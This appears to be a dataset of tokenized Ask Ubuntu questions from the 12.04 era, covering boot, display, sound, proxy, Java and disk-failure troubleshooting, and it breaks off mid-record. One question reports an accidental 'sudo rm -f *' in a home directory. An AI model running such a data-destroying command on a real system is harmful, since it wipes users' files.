141706	screen with ssh to overcome disconnection	i have a script name.bash . i want to run it on the server serv @ domaine with ssh but i 'm afraid to run it directly and close my shell and stop execution . i read that i can run my bash on the server with screen to overcome these problem . what are the commands i would use please ?
141710	continuous beeping on startup	i 'm having a problem with my ubuntu 12.04 right after installation , i 've restarted it several times and it went just fine . after that i 'm getting these continuous beeps right after post that i have n't experience in my previous os . sometimes it does n't come , sometimes it does . when i boot or restart with a bootable flash drive connected , the beeping does n't occur but when i start my laptop alone without any bootable flash connected , the beeping goes on . how do i resolve this problem ?
141712	how to prevent nautilus from launching ?	i 'm running i3-wm under a gnome session in 12.04 . nautilus is not normally running . i regularly loop-mount iso and other filesystem image files , and every time i do this nautilus pops up both a desktop window and a window opened at the new mount point . uninstalling nautilus is not an option -- i tried this , but apt reports that dozens of packages depend on it ( directly and indirectly ) . this question is similar , but only talks about preventing launching on usb stick insertion . i do n't want nautilus to run , ever -- removal would be ok with me if it did n't require uninstalling the world .
141714	12.04 does not shows my windows partions nor my dvd rom and aslo not my flash drive or phone memory card ?	i installed fresh a ubuntu system on my computer but then it does not show the ntfs partitions , dvd-rom and flash drive . i have two hdd 's . one is primary sata ( 80 gb ) and other is slave , an old ide ( 40 gb ) . neither shows up . what can i do to solve this problem ? ubuntu 10.04 works fine but not this one .
141716	second display is not detected ubuntu 12.04 on dell precision 390 desktop	i have a dell precision 390 desktop . i just did a clean install of ubuntu 12.04 , ran all of the updates ( ~150 ) , and updated the nvidia drivers . then i restarted . my second monitor was not working before or after any of the updates . i 'm a huge beginner with linux , so bear with me . can anyone help with this ?
141718	what is path environment variable and how to add it	i just installed picc-9.82.9453-linux.run from microchip website , and at the end it asked me == > note : you may wish to add the following /usr/hitech/picc/9.82/bin to your path environment variable . what does it mean ? i also need to add this to the environment path note : you may wish to add the following /usr/hitech/picc-18/pro/9.66/bin to your path environment variable .
141720	why is `` sudo virsh '' hanging in the console ?	i wanted to experiment with openstack on my imac : so i installed ubuntu cloud live image on a vm and i also ran devstack on a fresh ubuntu 64-bit server vm . the devstack script hangs on the following line : instances=`sudo virsh list -- all | grep $ instance_name_prefix | sed `` s/.*\ ( $ instance_name_prefix [ 0-9a-fa-f ] *\ ) . */\1/g '' ` i commented that block and ran the script again , this time it did not hang ; thus completing its run . i attempted to run sudo virsh list -- all on my cloudlive vm and it just hands until i break out of it . why is sudo virsh hanging ? your help is appreciated . note 1 : the virsh command responds without sudo . note 2 : not sure it matters , but i 'm running my virtual machines in vmware fusion .
141728	what apps are available for use with a touchscreen ?	what apps are there to download from the ubuntu software center that have been developed with a touchscreen in mind ?
141729	custom key to toggle keyboard layout	i want to set the key to toggle the language of my keyboard to `` ` '' but i do n't have this option at `` keyboard layout '' in unity , in ubuntu 12.04 . i have already seen this answer but it does n't help me . can you please direct me as to how to use setxkbmap ? ( if that 's the way to go ) . thanks !
141733	where/how to find the last linux-image patched with apparmor ( kernel needs apparmor 2.4 compatibility patch . )	where/how to find the last linux-image patched with apparmor ( kernel needs apparmor 2.4 compatibility patch . ) without patvhing myself the kernel ? thanks answer : https : //launchpad.net/ubuntu/precise/i386/linux-image https : //launchpad.net/ubuntu/precise/i386/linux-headers-3.2.0-24 https : //launchpad.net/ubuntu/precise/i386/linux-image-3.2.0-24-generic-pae/3.2.0-24.39
141734	incompatibility between wp super cache and php apc ?	i 'm using the `` wp super cache '' wordpress plugin on a ubuntu 12.04 server and found it is incompatible with php apc . after installing and activating the wordpress plugin , the blog was down and users were getting a error page : http error 500 ( internal server error ) : an unexpected condition was encountered while the server was attempting to fulfil the request . i noticed a segmentation fault in the apache error log ( /var/log/apache2/error.log ) . in the troubleshooting section of the wp super cache faq i noticed a description of my problem : the `` white screen of death '' or a blank page when you visit your site is almost always caused by a php error but it may also be caused by apc . disable that php extension if you have trouble and replace with eaccelerator or xcache . so i commented out the apc apache extension and restarted apache : > sudo emacs /etc/php5/apache2/conf.d/apc.ini ; extension=apc.so > sudo service apache2 restart sure enough , that fixed the problem - the blog was back up and caching enabled . the thing is , i actually want apc cache to run as well . the opcode cache is useful . i know i could use another opcode cache but does anyone know a apc setting i can change to allow this plugin to work with apc ? note : i also tried ubuntu 10.10 , 11.04 , 11.10 and had exactly the same issue .
141737	proxy authorisation works in firefox but not elsewhere	my corporation requires proxy to which you need to authorise . we are running on win7 system . i have installed virtualbox with ubuntu ( as 1st machine ) and centos ( 2nd machine ) . while in firefox access works in both virtual machines - credential popup shows up and i authorise using my domain\username and password - access is granted . but in the terminal and all os services there is no access to the internet . now - lets assume my login is as follows : aaa.net\ubuntu with password - ubuntu # 0 i set a proxy under network proxy settings to server and port then i set the proxy in the environment : export http_proxy=http : //aaa.net\ubuntu : ubuntu # 0 @ proxyip : port i also put this entry in /etc/apt/apt.conf acquire : :http : :proxy `` http : //aaa.net\ubuntu : ubuntu # 0 @ proxyip : port/ '' but it does not work at all - apt / yum are able to connect to proxy , but then they are given a 407 authorisation error . of course i was trying to put the url in quotes , also i have tried to use username\ @ domain syntax - but that doesnt change anything . i suspect system provides wrong syntax to the proxy - as there are special characters in both domain and password . but then again why firefox works without any problems ? if this fails - would you know a way to set wget/yum/apt to interactively ask for username/password ? most of all if you guys help me out on the problem - here is another thing . while setting env , yum , apt and or network proxy via ubuntu gui and providing username and password - system is basically compromised , as running simple command as printenv shows your password - so if someone executes this he would have my domain details which i use to all services at work . is there a way to put some md5 on the passwd or to encrypt it somehow ?
141741	re-enable graphical root-login on 12.04 lts	on ubuntu 11.10 , i enabled the graphical login as root by ( at least i think so ) running sudo passwd after upgrading to 12.04 lts , the graphical option has gone , while su in the terminal is still working . i ran sudo passwd once again , but i got no result ... any ideas ? ps : i do know the risks involved in enabling root , so please do n't ask that .
141744	not possible to see ubuntu 12.04 from the update manager	using ubuntu 12.04 , i can not see any update from my update manager . it gives me the message `` check your internet connection ''
141746	font setting reset after restart in kubuntu 12.04	hi i have a very annoying problem with kubuntu . every time when i change the font , and after a restart or a root privilege is elevated the font is changed to default ubuntu 9 . how to fix this annoying issue ?
141751	12.04 upgrade lost gb keyboard layout	upgraded from 11.10 to 12.04 . keyboard layout from system settings only shows us listed in options but /etc/default/keyboard contains : xkbmodel= '' pc105 '' xkblayout= '' gb '' xkbvariant= '' '' xkboptions= '' '' /etc/x11/xkb is empty , /etc/x11/xorg.conf does not exist . how do i recover uk keyboard layout so i can find # `` @ etc in the right place again ? thanks
141752	keyboard shortcut to move windows between monitors ?	i remember there used to be a setting under compiz that set a keyboard shortcut for moving applications between physical ( but combined as a single xscreen ) screens , similar to moving between logical screens , like ctrl-alt-shift-← / → / ↑ / ↓ . any way to do this under unity ?
141756	i have a new hp pavilion laptop that i 'd like to do a fresh install of the ubuntu os , any advice out there ?	i 've been putting this off for a good while chiefly b/c i really did n't want to spend the $ $ $ $ to get two os installed on mine and my spouse 's computer ( two hp pavilion 17.3 '' lp ) so , i left it until now and i 'm glad i did , b/c it appears as though ubuntu os ( all new 2me ! ) may be much better than what i thought i was going to install on these , but i do n't know enough yet to make a `` well '' informed decision can someone help me with this ? i would be most grateful , whatever you can throw my way as far `` what '' the major advantage over say , win7 is compared to ubuntu os , please tell me ! or should i install ubuntu os beside win7 ? what programs are compatible or not ? what should i look for to keep the ubuntu os clean and without bugs or damage ? if you can advise me anything you think may be important , please share this with me . thnank you ! it would be nice to have a community of like minded indiviuals to share information with and bounce ideas aound with , as well as , our thoughts when the occassion arises , from the litle i 've about this community , this is what it appears you all have here ? ! thanks in advance for your anticipated help ! p.s . if you do n't personally know how to answer these question , but know someone who may be able to , please convey that information with me , again , thank you kindly !
141757	partitioning drive	i am going to teach myself to administer linux . i want to be able to run both windows and linux . before i install ubuntu on my laptop , i was wondering if i should partition my drive first , and if so how much room is recommended ?
141759	how to install and enable gnome shell ?	i wanted to install gnome shell 3.4 on my ubuntu system . i tried running a lot of commands i found on a blog , but nothing has worked , and i still have unity 's look and feel . what am i doing wrong ?
141761	where can i find the mysql workbench dependencies ?	installing the .deb 32-bit , i have this warning : dependendy is not satisfiable : libmysqlclient16 ( > =5.1.21-1 ) have tried to apt-get install libmysqlclient16 : e : package 'libmysqlclient16 ' has no installation candidate and this apt-get install libmysqlcliente18 installed correctly but when trying to install mysql workbench again , i have the same error . edit i have tried this but the result : sudo gdebi mysql-workbench-gpl-5.2.40-1ubu1104-i386.deb reading package lists ... done building dependency tree reading state information ... done building data structures ... done building data structures ... done this package is uninstallable dependency is not satisfiable : libmysqlclient16 ( > = 5.1.21-1 ) edit making the installation apt-get install mysql-workbench worked but installed an older version of it .
141762	customizing ubuntu mini remix	i 've been using ubuntu for 2 years and now i want to make my own . i just decided to get the ubuntu minimal iso for the core of my custom distro ... but everything seems so confusing ! ! ! could anyone give me some help about how to start and add some packages and x , a good documentation could help as well .
141765	no sound with thunderbird 12.0.1	i have installed ubuntu 12.04 and thunderbird 12.0.1 from scratch but i hear no sound when new mail arrives . i have installed pulseaudio-esound-compat and esound-common but the problem persist . how can i fix this , and get new mail notification sounds in thunderbird ? bug reported here : https : //bugs.launchpad.net/ubuntu/+source/thunderbird/+bug/1009108
141768	gthumb browser and viewer should have black background , how to do ?	i really like gthumb but i hate that gthumb is using my standard ambiance theme when viewing images . the result is that i have a lightgrey background for images but in my opinion images look the best with a black background . here is the area i want to have black ( look at the red arrow ) : is there a way that i can configure gthumb or let gthumb use another theme than the rest of my programs ?
141769	ubuntu will not boot after updates	i had installed several updates and now ubuntu 12.04 will not boot at all . it brings me to the login screen . i login and the screen goes blank . help ...
141775	`` starting home folder '' issue in gnome classic nautilus	when i open nautilus in ubuntu 12.04 gnome-session-fallback , it shows two tabs in the panel , one is my nautilus , the other `` starting home folder '' ( encircled green ) stays there for 10-15 seconds and then disappears . i do n't want it to appear . anyone have any idea why this happens and can i have a solution for it ?
141781	squid3 fails to start on boot	squid3 does not start automatically on boot , in some cases . i have start it manually with sudo service squid3 start . any reason why ?
141784	how can i integrate deadbeef into the sound indicator menu ?	is it a way to put deadbeef to sound menu instead of rhythmbox ?
141786	how do i enable webgl support on an intel nm10 ?	i 'm trying to use webgl on the last version of chrome and firefox but both say : sorry , your browser does n't support webgl ! lspci : 00:00.0 host bridge : intel corporation n10 family dmi bridge 00:02.0 vga compatible controller : intel corporation n10 family integrated graphics controller 00:02.1 display controller : intel corporation n10 family integrated graphics controller glxgears : 296 frames in 5.0 seconds = 59.153 fps 300 frames in 5.0 seconds = 59.846 fps i 'm at ubuntu 12.04 64 . what should i install to get this working ?
141789	connection error with evernote on 12.04 ?	i just upgraded to 12.04 , with gnome classic no effects . evernote worked ok on 11.04 and 11.10 with wine 1.3 configired as windows 7 . i 'm installing evernote_4.5.6.6884.exe . the install works fine , but it ca n't connect . i 'm getting an error in ssl : err : wininet : netcon_secure_connect ssl_connect failed : 12157 i 've tried wine 1.3 and 1.4 , configured as windows 7 . i 've installed libssl 0.9.8 . i 've tried using playonlinux . play on linux gives extra information : fixme : wininet : internetattemptconnect stub fixme : wininet : internetsetoptionw option internet_option_connect_timeout ( 15000 ) : stub fixme : wininet : internetsetoptionw internet_option_send/receive_timeout/data_send_timeout 15000 fixme : wininet : internetsetoptionw internet_option_send/receive_timeout/data_send_timeout 60000 err : wininet : netcon_secure_connect ssl_connect failed : 12157 does anyone have a known good installation process for wine/evernote on 12.04 ? [ update ] more info running from playonlinux from commandline : /usr/share/playonlinux/playonlinux -- run `` evernote '' /usr/share/playonlinux/python [ pol_system_checkfs ] message : checking filesystem for evernote.exe [ pol_wine ] message : running wine- evernote.exe [ pol_wine ] message : notice : playonlinux deliberately disables winemenubuilder . see http : //www.playonlinux.com/fr/page-26-winemenubuilder.html [ pol_wine ] error : wine seems to have crashed if your program is running , just ignore this message [ pol_wine ] message : wine return : 2 p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory [ 0524/134608 : error : network_change_notifier_win.cc ( 98 ) ] wsalookupservicebegin failed with : 8
141791	is there a way to update all java related alternatives ?	is there a way to quickly switch over all the java related alternatives using update-alternatives ? for instance , if want to switch java over to 7 , i run sudo update-alternatives -- config java and select the java 7 openjdk . but if i run update-alternatives -- get-selections | grep java i get the following , appletviewer auto /usr/lib/jvm/java-6-openjdk-amd64/bin/appletviewer extcheck auto /usr/lib/jvm/java-6-openjdk-amd64/bin/extcheck idlj auto /usr/lib/jvm/java-6-openjdk-amd64/bin/idlj itweb-settings auto /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/itweb-settings jar auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jar jarsigner auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jarsigner java manual /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java javac auto /usr/lib/jvm/java-6-openjdk-amd64/bin/javac javadoc auto /usr/lib/jvm/java-6-openjdk-amd64/bin/javadoc javah auto /usr/lib/jvm/java-6-openjdk-amd64/bin/javah javap auto /usr/lib/jvm/java-6-openjdk-amd64/bin/javap javaws auto /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/javaws jconsole auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jconsole jdb auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jdb jexec auto /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/jexec jhat auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jhat jinfo auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jinfo jmap auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jmap jps auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jps jrunscript auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jrunscript jsadebugd auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jsadebugd jstack auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jstack jstat auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jstat jstatd auto /usr/lib/jvm/java-6-openjdk-amd64/bin/jstatd keytool auto /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/keytool native2ascii auto /usr/lib/jvm/java-6-openjdk-amd64/bin/native2ascii orbd auto /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/orbd pack200 auto /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/pack200 policytool auto /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/policytool rmic auto /usr/lib/jvm/java-6-openjdk-amd64/bin/rmic rmid auto /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/rmid rmiregistry auto /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/rmiregistry schemagen auto /usr/lib/jvm/java-6-openjdk-amd64/bin/schemagen serialver auto /usr/lib/jvm/java-6-openjdk-amd64/bin/serialver servertool auto /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/servertool tnameserv auto /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/tnameserv unpack200 auto /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/unpack200 wsgen auto /usr/lib/jvm/java-6-openjdk-amd64/bin/wsgen wsimport auto /usr/lib/jvm/java-6-openjdk-amd64/bin/wsimport xjc auto /usr/lib/jvm/java-6-openjdk-amd64/bin/xjc as you can see , my java alternative was switched over to 7 , but every other alternative based on openjdk 6 was not switched over . sure i could switch each one manually or write a script to do so , but i assume there is a better way to accomplish this .
141796	what is the new `` management service '' in the system settings ?	in the ubuntu 12.04 version , there is an item in the system settings under system category with name `` management service '' . when i clicked on it a new windows appears and asks for installing landscape client . what is this `` management service '' ? . do i need this ?
141799	how can i import calc data into libreoffice base ?	in ms office access for instance there is always a way to import excel data just right in access ribben labeled import external file and by following the wizard view , you can easily link to excel data . but i do n't know whether it is possible in libreoffice base to import calc data . is there anyway to achieve that ? at work most of the time my colleagues sent me files in xlsx so when i want to use them in base i do n't know what to do . i like base because it can deal with large quantity of data unlike calc or excel .
141802	photoshop cs2 under wine 1.4 messes up unity desktop	i 'm aware that the general consensus is that photoshop is at best barely usable under wine . i 'm one of the lucky few that got cs2 ( apparently one of the least quirky ) running well under wine 1.4 in ubuntu 12.04 . all the mentioned quirks like the crashes provoked by the text tool are not present . with the -for my practical purposes- unimportant exception of bridge refusing to start , the rest is working just fine . the only grave quirk it has is that on closure , it messes up completely the unity desktop , lossing automatically the 3d appearance , leaving me with a d2 desktop , square cornered windows and without the ( x ) ( - ) ( [ ] ) buttons and windows title . this forces me to close the windows by means of ctrl-q and eventually a reboot to get back the correct desktop and window appearance . in the likely case there 's no solution to this behaviour , is there a command or script i may use to restore the usual desktop ? that would allow me to place a launcher to that effect . i 'll appreciate any comment not in the lines of looking for a photoshop substitute . i 've been through all and they wo n't let me do in a practical manner what i need . many thanks in advance . jorge . update 27.05.2012 14:20 cst : eliah kagan and alvin have helped me to pinpoint the problem to the 3d session . thus , so far the solution involves logging-out of the 3d session and logging back-in with a 2d session before starting photoshop ; then it exits normally and does n't disturb the desk . of great help would be a way to switch-off the 3d effects without having to log-out , and then back-on , if it is at all feasible . of even greater help would be a bash script to automate this . update 27.05.2012 19:10 cst : jasmines ' suggestion to do a compiz -- replace does n't terminate correctly , although while the order is still in a loop the desktop appears normal . however , closing the terminal or breaking the loop reverts the session status to a crippled desk , no top panel , no launcher , no window top bar & controls and now ; no keyboard . the final output of the compiz -- replace where it gets stuck is this : warn 2012-05-27 20:44:32 unity < unknown > :0 unable to fetch children : no existe la interfaz «org.ayatana.bamf.view» en el objeto en la ruta /org/ayatana/bamf/application62801462 warn 2012-05-27 20:44:32 unity < unknown > :0 unable to fetch children : no existe la interfaz «org.ayatana.bamf.view» en el objeto en la ruta /org/ayatana/bamf/application62801462 hopefully somebody can decode this . it 's sanskrit to me . the solution to the problem is still at large ... solved ! see virpara 's answer . i created the script by his suggestion and placed a launcher to it in my desktop . works like a charm and solves my photoshop exit bad manners in less than a minute : - ) adding 3 screen captures of before , during and after . beautiful . this place is a wealth of knowledge . many thanks to all who participated .
141803	how can i backup installed firefox add-ons and restore	i have downloaded and installed several firefox add-ons and plugins . i like to be able to backup these add-ons , so that a new fresh installation does not require new downloads . so my question is -- how can i backup my current installed firefox add-ons , to avoid redownloading ? edit one answer added a method to backup . how can i restore those add-ons without installing every add-ons i had installed ? . ( like copying add-on files on specific directories . )
141806	wallpapers of only some users being dynamically loaded in lightdm	as this answer explains : ubuntu 12.04 unity greeter has introduced selected user dynamic background , that means that when selecting a user from the available users list the background will change to reflect the selected user 's desktop background . however , i am puzzled , because in my experience this is n't consistently true . on one of my family members ' computers , where there are three users , only one of the users ' background shows in lightdm . none of the users are newly created . the user whose background is showing has a custom background ; one of the users whose background does n't show also does ; and the other one who does n't has the default switching wallpaper set . it is not a clean install but has been incrementally upgraded from about 8.04 . any idea what could be happening ? this is a similar question , though we 're also having the opposite problem ( default wallpapers not showing ) . ( i do not have access to the computer mentioend above at the moment ; when i do i will use some of the criteria given there to analyze the problem further . )
141810	which character can work as `` tick '' ( us `` check-mark '' ) in documents under ubuntu and windows ?	i need to use a character for `` tick '' in libreoffice documents that will display ok in ubuntu and windows . character 252 ( or thereabout ) in wingdings works in windows but obviously this character would n't be displayed properly on systems lacking the fontset ( eg my ubuntu system ) . can wingdings be installed in ubuntu ? that would solve my problem of transferring documents between my windows and ubuntu systems . is there another way to solve this ? eg an anternative font that looks like a `` tick '' and works across setups . i suppose if there is no other way , i could use the square root character , which is in the basic fontset .
141811	force unity to open any file with any program	when you drag a file to the unity launcher , only the applications that are supposed to open that file will remain active , while all others become deactivated . is it possible to configure unity to ignore that setting and open the file , no matter what extension the file has , with any of the applications on the launcher ? i 'd be glad to get an unsupported file type from the application when i make a mistake instead of losing a bunch of time configuring what application can open what file ( that 's because it is no longer possible to add a custom application/path in the open with ... menu )
141812	deleted files in home directory by using sudo rm -f *	so i accidentally ran 'sudo rm -f * ' within my home directory . should i worry about it ? i did i delete hidden files ? can i get it back ? or did i just deleted empty folders ( pictures , music , etc ) ? edit : this is a fairly new install , so i didnt have any pictures , songs , etc . also , it is a ext2 partition
141814	lord of ultima and bit trip runner not available in muon software centre	most of the basic apps are found in the muon software centre in kubuntu . however , i can not find either 'lord of ultima ' or 'bit trip runner ' , although i see them available in the ubuntu software centre . i 'd like to install these games via the software centre so it gets added to the download stats for the game developers to see . how come i ca n't see these in muon software centre ?
141832	usb mouse sleeping after 5 seconds when on battery	my usb mouse sleeps after 5 seconds of inactivity when running on battery power . it wakes uo again when i press any button on the mouse . this is really annoying . i have made lsusb , and i noticed my mouse is bus 001 device 012 : id 04d9:2083 holtek semiconductor , inc . i have checked my /sys/bus/usb/devices/usb1/power/autosuspend but it is already set to 0 , and the directory usb1 has many subdirectories which also have autosuspend files , and i dont know how to edit them . also , i would like a permanent solution , which would work for any mouse , on any of my 3 usb ports . any ideas ? using : ubuntu 12.04 64bit
141834	wireless problems with inspiron 1545 in version 12.04	i installed ubuntu 12.04 and i ca n't seem to locate an answer on how to install the wireless drivers for it . i 'm a noob linux user so , complete directions are appreciated . if you need anything to help solve the problem , you need only ask and i shall provide . thank you , in advance , to anyone who offers any help for me .
141837	ubuntu is so slow	i installed ubuntu ( 12.4 , i think ) on my acer aspire one netbook because win7 was so slow and i 'd heard great things about ubuntu . win7 was slow but ubuntu is glacial , every program takes an age to load and every action is painfully slow . what can be done to get it running at a decent speed ? i 'm sure this is not how it is supposed to run .
141838	i have slow performance on my ubuntu installation , what can i try ?	everything i do on ubuntu takes ages , what can i do to speed things up ?
141845	graphics problems in ubuntu 12.04 - newbie	i am new to ubuntu so please go easy ! i managed to installed ubuntu 12.04 alongside vista after a little bit of work , as i kept getting a black screen with compiz crashing and the keyboard not working . unfortunately after a fair amount of reading up on the problem i still could n't understand what to do , and ended up getting lucky with a third install that got the pc working . now another new problem . after installing chrome and going into the software centre , the window stayed a solid white . after restarting the computer an error message came up saying : '' ubuntu is running in low-graphics mode . your screen , graphics card , and input devices could not be detected correctly . you will have to configure these yourself . '' there is no interface and i 'm a little stuck . i am guessing it would be wise to update the video card drivers , although i have n't been able to test to see if the terminal will open ( ctrl-alt-t ? ) . is that what i should try or is there maybe another cause of the problem ? any help is very much appreciated ! darran
141846	how to print to 12.04 from macbook	i upgraded to 12.04 a few days ago and can no longer print to my shared printer ( hp p1006 ) from my macbook pro ( 10.6 ) . i can print locally . printer sharing was working acceptably before the upgrade ; it required identifying myself as `` guest '' on every print request , but i could live with that . now i consistently get authentication rejections as either a registered user ( registration defined in the sambu gui app ) , or as guest . any suggestions ?
141847	how do i check a package is safe/stable ?	i have recently moved from doing web development on a from-home basis ( with simple wordpress edits and such ) to more of a full time position . this means i am now , to a small degree , dealing with server management as well . i know that , for instance , with the bigger packages like php , moodle , alfresco etc etc , i can check their forums to gauge user acceptance before applying an update . however , i also see alot of package updates for other packages ( generally library packages mainly used for dependencies ) , like libpql or libssl . googling these just tends to get me alot of the package list websites that have the package but there does n't seem to be a whole lot of talk about them and their latest updates ( at least , not that i am finding ) . up until i started this job , i would have just applied them off the bat , with the thought-process being `` if ubuntu has them on their package list , they 've been checked as stable '' . a few months of dealing with the bugs that do make it into releases of larger packages ( like alfresco , moodle ) , however , has made me more wary . is there a good place i can look for information about these packages , can i just assume that `` no news is good news '' for packages i do n't see anything about when googling , or perhaps do i just bite the bullet and accept that i ca n't know for sure , so make sure my backup plan is working ( it is ) ?
141848	brightness keys do n't work on a toshiba satellite l655	i have a laptop toshiba satallite l655 with ati radeon hd 5650 . i have a problem in my super key for the brigthness . when ever i press fn+f6 or fn+f7 to increase or decrease the light , nothing happens . by the way , this problem started when i installed my graphic card driver from ubuntu additional drivers ... please can any one help me ! ! !
141850	where to install burg ?	i 've seen a lot of guides to install burg , but they all say do : sudo burg-install /dev/sda and replace sda with whatever drive my boot information is on . when i do `` sudo fdisk -l '' , i get : device boot start end blocks id system /dev/sda1 2048 3074047 1536000 27 hidden ntfs winre /dev/sda2 * 3074048 358905658 177915805+ 7 hpfs/ntfs/exfat /dev/sda3 604071936 625141759 10534912 17 hidden hpfs/ntfs /dev/sda4 358905854 604071935 122583041 5 extended /dev/sda5 358905856 595953663 118523904 83 linux /dev/sda6 595955712 604071935 4058112 82 linux swap / solaris so where should i do burg-install at ? am i just supposed to do it at /dev/sda ? i really do n't want to mess anything up .
141853	headphones not working . realtek alc270 . asus k55vd-ds71 laptop . ubuntu 12.04	i helping my friend to setup ubuntu who is a first time user . it 's an asus k55vd-ds71 laptop . following codecs are being reported on the system when i issue the command cat /proc/asound/card0/codec* | grep codec codec : realtek alc270 codec : intel pantherpoint hdmi` using the alsa information script v0.4.60 i have obtained information about my alsa setup and device which is here the interesting thing is that pulse audio sound settings reports only one device and that is headphones ( build in audio ) but the sound comes only from speaker even if speakers are not listed there . there is no sound from the headphones . i played around with alsamixer a bit and also alsa-base.conf a bit and once got the sound working from headphones but after restart the same problem as described above reappeared . if i could get it to work once i believe there must be something really trivial which i am missing here . does anyone have any suggestions ? thanks in advance . p.s : my friend is using ubuntu for the first time so i am trying to make the transition from windows as smooth as possible . a non-working hardware especially headphones can be a major roadblock .
141862	is this drive failure or something else ?	i have a year-old drive that 's giving me trouble . copying data to it fails after about 8-10gb of transfers . it spontaneously changes to 'read only ' . it 's properly formatted ext4 , i 'm the owner . searching online , it looks like this is a symptom of a failing drive . how do i confirm this , since the smart tests indicate otherwise ? i did the obvious like check the disk utility , and ran the extended smart test . all results from disk utility come back perfect . read error rate and reallocated sectors are showing zero . i 'm guessing this disk is bad and smart is n't detecting it , though i do n't understand why . i 'd like to confirm what the problem is . i 'm having no problems with the other disks in the machine . fstab : proc /proc proc nodev , noexec , nosuid 0 0 uuid=62e11126-3f06-43f0-bd5a-29b411bb8160 / ext4 errors=remount-ro 0 1 uuid=5e2d6348-be6e-4d5d-8f7f-1a5c1cab7db2 /home ext4 defaults 0 2 uuid=97e594a3-c783-4c73-97c0-682afcdc88b6 none swap sw 0 0 /dev/disk/by-label/media /media/media ntfs-3g defaults , user , locale=en_gb.utf8 0 0 output of dmesg | less : ( there are hundreds more 'buffer i/o error ' lines above ) [ 22734.511487 ] buffer i/o error on device sda1 , logical block 302203 [ 22734.511489 ] buffer i/o error on device sda1 , logical block 302204 [ 22734.511490 ] buffer i/o error on device sda1 , logical block 302205 [ 22734.511492 ] buffer i/o error on device sda1 , logical block 302206 [ 22734.511494 ] buffer i/o error on device sda1 , logical block 302207 [ 22734.511496 ] ext4-fs warning ( device sda1 ) : ext4_end_bio:251 : i/o error writing to inode 9437465 ( offset 4194304 size 524288 starting block 302215 ) [ 22734.511500 ] ata1 : eh complete [ 22734.511616 ] ext4-fs error ( device sda1 ) : ext4_journal_start_sb:327 : detected aborted journal [ 22734.511619 ] ext4-fs ( sda1 ) : remounting filesystem read-only [ 22734.519343 ] ext4-fs error ( device sda1 ) in ext4_da_writepages:2298 : io failure [ 22734.538566 ] ext4-fs ( sda1 ) : ext4_da_writepages : jbd2_start : 601 pages , ino 9437474 ; err -30 [ 22734.560225 ] ata1.00 : exception emask 0x10 sact 0x1 serr 0x400100 action 0x6 frozen [ 22734.560253 ] ata1.00 : irq_stat 0x08000000 , interface fatal error [ 22734.560256 ] ata1 : serror : { unrecovdata handshk } [ 22734.560258 ] ata1.00 : failed command : write fpdma queued [ 22734.560262 ] ata1.00 : cmd 61/00:00:3f:68:25/04:00:00:00:00/40 tag 0 ncq 524288 out [ 22734.560263 ] res 40/00:04:3f:68:25/00:00:00:00:00/40 emask 0x10 ( ata bus error ) [ 22734.560264 ] ata1.00 : status : { drdy } [ 22734.560268 ] ata1 : hard resetting link [ 22735.047845 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 22735.052069 ] ata1.00 : configured for udma/33 [ 22735.067810 ] ata1 : eh complete [ 22735.136249 ] ata1.00 : exception emask 0x10 sact 0x3f serr 0x400100 action 0x6 frozen fsck result : tom @ 1204-desktop : ~ $ sudo fsck /dev/sda1 [ sudo ] password for tom : fsck from util-linux 2.20.1 e2fsck 1.42 ( 29-nov-2011 ) new_volume : recovering journal new_volume contains a file system with errors , check forced . pass 1 : checking inodes , blocks , and sizes pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information free blocks count wrong ( 236669077 , counted=236701938 ) . fix < y > ? yes free inodes count wrong ( 61048336 , counted=61048349 ) . fix < y > ? yes last but not least is the read/write screengrab , this is new . it used to stay pretty consistent over the duration of the test . edit- when i powered on this morning the drive had changed from /dev/sda to /dev/sdc , strange . i 'm certain that has n't happened before and i 'm certain it was /dev/sda . i swapped sata cables with a known good one and saw that same failure at about 10gb transfers . i did n't change sata ports yet , i 'll try that next . ( edit # 2 , it was the sata port , changing it fixed the problem . flagging this as too localized . ) output of sudo smartctl -a /dev/sda === start of information section === model family : western digital caviar black device model : wdc wd1002faex-00y9a0 serial number : wd-wcaw30776630 lu wwn device id : 5 0014ee 25acf2868 firmware version : 05.01d05 user capacity : 1,000,204,886,016 bytes [ 1.00 tb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : exact ata specification draft version not indicated local time is : fri may 25 07:16:18 2012 bst smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x82 ) offline data collection activity was completed without error . auto offline data collection : enabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 16500 ) seconds . offline data collection capabilities : ( 0x7b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 